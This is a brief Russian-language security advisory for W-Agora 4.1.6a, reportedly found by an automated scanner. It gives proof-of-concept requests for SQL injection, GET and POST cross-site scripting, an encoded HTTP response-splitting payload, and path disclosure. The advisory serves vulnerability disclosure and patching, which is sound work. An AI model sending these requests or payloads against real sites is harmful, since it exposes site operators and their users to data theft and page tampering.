Программа: W-Agora 4.1.6a
Несколько уязвимостей обнаружено в W-Agora. Удаленный пользователь может внедрить SQL команды. Удаленный пользователь может выполнить XSS и HTTP response splitting нападение. Удаленный пользователь может определить инсталляционный путь.
1. SQL injection
redir_url.php?bn=demos_links&key=[SQL]
2. XSS in GET:
download_thread.php?site=support&bn=support_install&thread=[XSS
code here]
3. XSS in POST:
POST /login.php HTTP/1.1
Host: w-agora
Content-Type: application/x-www-form-urlencoded
Content-Length: 89
loginform=1&redirect_url=1&loginuser=[XSS code here]&loginpassword=1
POST /forgot_password.php HTTP/1.1
Host: w-agora
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
go=1&userid=[XSS code here]
4. HTTP response splitting
/subscribe_thread.php?site=support&bn=support_instal l&thread=%0d%0aContent-Length:%200%
0d%0a%0d%0a%20200%20OK%0d%0aConte nt-Type:%20text/html%0d%0aContent-Length:%
2034%0d%0a%0d%0a%3chtml%3eScan ned%20by%20PTsecurity%3c/html%3e%0d%0a
5. Раскрытие пути
/list.php?bn=support_install&last=19&collapse=|id|
Данные уязвимости были обнаружены в результате автоматической проверки Web приложений сканером безопасности Xspider.
